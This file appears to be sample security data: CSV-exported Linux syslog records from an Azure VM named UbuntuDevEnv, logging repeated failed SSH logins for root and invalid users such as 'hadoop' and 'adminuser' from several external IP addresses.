+14813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:48,UbuntuDevEnv,2019-06-26 05:08:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:48,UbuntuDevEnv,2019-06-26 05:08:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:49,UbuntuDevEnv,2019-06-26 05:08:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:50,UbuntuDevEnv,2019-06-26 05:08:50,auth,UbuntuDevEnv,info,Failed password for invalid user service from 140.143.223.242 port 50480 ssh2,6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,140.143.223.2,50480,,
+14817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:51,UbuntuDevEnv,2019-06-26 05:08:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:51,UbuntuDevEnv,2019-06-26 05:08:51,auth,UbuntuDevEnv,info,Disconnected from invalid user service 140.143.223.242 port 50480 [preauth],6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,140.143.223.2,50480,,
+14819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:51,UbuntuDevEnv,2019-06-26 05:08:51,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 50480:11: Bye Bye [preauth],6021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,50480,,
+14820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:54,UbuntuDevEnv,2019-06-26 05:08:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:56,auth,UbuntuDevEnv,info,Invalid user hadoop from 200.6.188.38 port 8737,6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,200.6.188.3,8737,,
+14822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:57,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56639 ssh2,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:57,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:57,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56639 ssh2 [preauth],5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56639,,
+14827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:57,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:57,UbuntuDevEnv,2019-06-26 05:08:57,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56639: Too many authentication failures [preauth],5998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56639,,
+14829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:59,UbuntuDevEnv,2019-06-26 05:08:58,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 200.6.188.38 port 8737 ssh2,6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,200.6.188.3,8737,,
+14830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:59,UbuntuDevEnv,2019-06-26 05:08:59,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 8737:11: Bye Bye [preauth],6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,8737,,
+14831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:08:59,UbuntuDevEnv,2019-06-26 05:08:59,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 200.6.188.38 port 8737 [preauth],6061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,200.6.188.3,8737,,
+14832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:00,UbuntuDevEnv,2019-06-26 05:09:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:02,UbuntuDevEnv,2019-06-26 05:09:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 63279 ssh2,6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63279,,
+14834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:02,UbuntuDevEnv,2019-06-26 05:09:02,auth,UbuntuDevEnv,info,Invalid user adminuser from 5.135.161.72 port 51390,6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,5.135.161.7,51390,,
+14835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:02,UbuntuDevEnv,2019-06-26 05:09:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:02,UbuntuDevEnv,2019-06-26 05:09:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:04,UbuntuDevEnv,2019-06-26 05:09:04,auth,UbuntuDevEnv,info,Failed password for invalid user adminuser from 5.135.161.72 port 51390 ssh2,6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,5.135.161.7,51390,,
+14838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:04,UbuntuDevEnv,2019-06-26 05:09:04,auth,UbuntuDevEnv,info,Disconnected from invalid user adminuser 5.135.161.72 port 51390 [preauth],6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adminuser,5.135.161.7,51390,,
+14839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:04,UbuntuDevEnv,2019-06-26 05:09:04,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 51390:11: Bye Bye [preauth],6084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,51390,,
+14840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:05,UbuntuDevEnv,2019-06-26 05:09:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 63279 ssh2,6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63279,,
+14841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:16,UbuntuDevEnv,2019-06-26 05:09:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:16,UbuntuDevEnv,2019-06-26 05:09:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:16,UbuntuDevEnv,2019-06-26 05:09:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 63279 ssh2 [preauth],6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63279,,
+14844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:16,UbuntuDevEnv,2019-06-26 05:09:15,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 63279 ssh2],6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63279,,
+14845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:16,UbuntuDevEnv,2019-06-26 05:09:15,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 63279: Too many authentication failures [preauth],6069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,63279,,
+14846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:19,UbuntuDevEnv,2019-06-26 05:09:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:21,UbuntuDevEnv,2019-06-26 05:09:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5883 ssh2,6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5883,,
+14848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:34,UbuntuDevEnv,2019-06-26 05:09:34,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 5883: Too many authentication failures [preauth],6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,5883,,
+14849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:34,UbuntuDevEnv,2019-06-26 05:09:34,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 5883 ssh2 [preauth],6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5883,,
+14850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:34,UbuntuDevEnv,2019-06-26 05:09:34,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 5883 ssh2],6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5883,,
+14851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:34,UbuntuDevEnv,2019-06-26 05:09:34,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:34,UbuntuDevEnv,2019-06-26 05:09:34,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6144,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:38,UbuntuDevEnv,2019-06-26 05:09:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:40,UbuntuDevEnv,2019-06-26 05:09:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12764 ssh2,6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12764,,
+14855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:47,UbuntuDevEnv,2019-06-26 05:09:45,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 12764 ssh2],6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12764,,
+14856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:49,UbuntuDevEnv,2019-06-26 05:09:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12764 ssh2,6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12764,,
+14857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:55,UbuntuDevEnv,2019-06-26 05:09:54,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:55,UbuntuDevEnv,2019-06-26 05:09:54,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 12764 ssh2],6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12764,,
+14859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:55,UbuntuDevEnv,2019-06-26 05:09:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:55,UbuntuDevEnv,2019-06-26 05:09:54,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 12764: Too many authentication failures [preauth],6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,12764,,
+14861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:55,UbuntuDevEnv,2019-06-26 05:09:54,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 12764 ssh2 [preauth],6210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12764,,
+14862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:09:58,UbuntuDevEnv,2019-06-26 05:09:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:00,UbuntuDevEnv,2019-06-26 05:09:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20185 ssh2,6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20185,,
+14864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:03,UbuntuDevEnv,2019-06-26 05:10:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20185 ssh2,6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20185,,
+14865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:13,UbuntuDevEnv,2019-06-26 05:10:12,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:13,UbuntuDevEnv,2019-06-26 05:10:12,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 20185: Too many authentication failures [preauth],6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,20185,,
+14867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:13,UbuntuDevEnv,2019-06-26 05:10:12,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 20185 ssh2 [preauth],6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20185,,
+14868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:13,UbuntuDevEnv,2019-06-26 05:10:12,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 20185 ssh2],6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20185,,
+14869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:13,UbuntuDevEnv,2019-06-26 05:10:12,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:16,UbuntuDevEnv,2019-06-26 05:10:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:19,UbuntuDevEnv,2019-06-26 05:10:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27293 ssh2,6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27293,,
